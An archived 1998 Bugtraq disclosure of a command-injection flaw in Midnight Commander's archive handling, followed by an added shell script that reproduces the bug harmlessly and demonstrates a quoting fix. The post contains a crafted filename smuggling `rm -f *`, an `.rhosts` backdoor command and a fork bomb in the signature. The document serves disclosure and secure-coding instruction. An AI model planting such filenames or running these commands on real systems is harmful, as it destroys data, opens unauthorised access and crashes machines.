[6000] in bugtraq
MC shell scripts
daemon@ATHENA.MIT.EDU (Michał Zalews)
Mon Jan 19 10:35:40 1998
Date: Sat, 17 Jan 1998 22:14:45 +0100
Reply-To: Michał Zalewski <lcamtuf@POLBOX.COM>
From: Michał Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
I discovered a problem with Midnight Commander's method of decompressing
archives, which allows execution of hidden commands. An evil file may be
prepared this way:
$ gzip foo
$ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz"
Now, this filename, when displayed by user-friendly programs (www or
ftp browsers, file managers), will be cropped to fit in a window :)
Under my mc (vidmode 11) it's displayed as:
quake2-test-unknown-linu~-i386-generic-beta.gz (or .tgz, your choice :)
When I'm viewing or editing a .gz archive (F3/F4/ENTER), Midnight Commander
calls gzip from a shell script created in /tmp:
gzip -dc 'filename' 2>/dev/null
That may be dangerous. In the above case, this script is equal to:
gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null
rm -f *
'rm -f *' may be replaced with 'echo + +>.rhosts',
'touch WHOS_THE_WINNER', etc. ;)
Of course, it isn't a serious problem for experienced users, but
what about the non-experienced ones (80%) ;-)
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
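The quoting failure described in the post, reproduced and fixed as an added example (this is not code from the post or from Midnight Commander). The generated /tmp script is modelled as a one-line command built from a filename; the original construction pastes the raw name between single quotes, the fixed one quotes the name so it is always a single literal word. The helper names (vulnerable_cmd, safe_cmd, sq, injected) and the marker file are this example's own; the malicious filename follows the post, with the `touch` payload it mentions instead of `rm -f *`. It needs only a POSIX sh and mktemp; gzip need not be installed, since the injection happens while the shell parses the line, before gzip runs.

```shell
#!/bin/sh
# Added example, not code from the original post or from Midnight Commander.
# Models the generated script as a one-line command built from a filename and
# compares the original construction (name pasted between single quotes) with
# a correctly quoted one. Helper names and the marker file are this example's
# own; the malicious filename follows the post, using `touch` as the payload.

# Constructed malicious filename: the embedded ' closes the caller's quote,
# so the backticks are evaluated by the shell before gzip ever runs.
EVIL="quake2-test-unknown-linux-'\`touch WHOS_THE_WINNER\`'-elf-i386-generic-beta.gz"

# What the original script did: wrap the raw name in '...'. Any ' in the
# name terminates the quoting early.
vulnerable_cmd() {
    printf "gzip -dc '%s' 2>/dev/null\n" "$1"
}

# Quote a string for the POSIX shell so it is always one literal word: wrap
# it in '...' and replace each embedded ' with '\'' (close quote, escaped
# quote, reopen). Done with parameter expansion so newlines in the name
# survive (sed would split on them).
sq() {
    s=$1
    out=
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}          # first character of $s
        s=${s#?}                 # rest of $s
        if [ "$c" = "'" ]; then
            out="$out'\\''"
        else
            out="$out$c"
        fi
    done
    printf "'%s'" "$out"
}

# Fixed construction: the name is quoted by sq, not pasted between quotes.
safe_cmd() {
    printf "gzip -dc %s 2>/dev/null\n" "$(sq "$1")"
}

# Run one generated command in a scratch directory and return 0 if the
# injected touch fired. The command itself is allowed to fail: the .gz does
# not exist and gzip may be absent; only what the shell did while parsing
# the command line matters here.
injected() {
    dir=$(mktemp -d) || return 2
    ( cd "$dir" && sh -c "$1" >/dev/null 2>&1 ) || true
    if [ -e "$dir/WHOS_THE_WINNER" ]; then r=0; else r=1; fi
    rm -rf "$dir"
    return $r
}

vulnerable_fires() { injected "$(vulnerable_cmd "$EVIL")"; }
safe_fires()       { injected "$(safe_cmd "$EVIL")"; }

# Stand-alone run: show both generated scripts and what each one did.
printf 'original script: %s\n' "$(vulnerable_cmd "$EVIL")"
printf 'fixed script:    %s\n' "$(safe_cmd "$EVIL")"
if vulnerable_fires; then echo "original: injected command ran"; fi
if safe_fires; then
    echo "fixed: injected command ran (BUG)"
else
    echo "fixed: name passed to gzip as one literal word"
fi
```

The same quoting rule applies to any filename, not only to names carrying backticks: `$(...)`, `;`, `|` and newlines are all neutralised once the whole name sits inside single quotes with the `'\''` escape. The more robust design is to not build a shell command line from untrusted names at all and instead exec the decompressor directly with the filename as an argv element; where a shell script is unavoidable, quoting as above is the minimum.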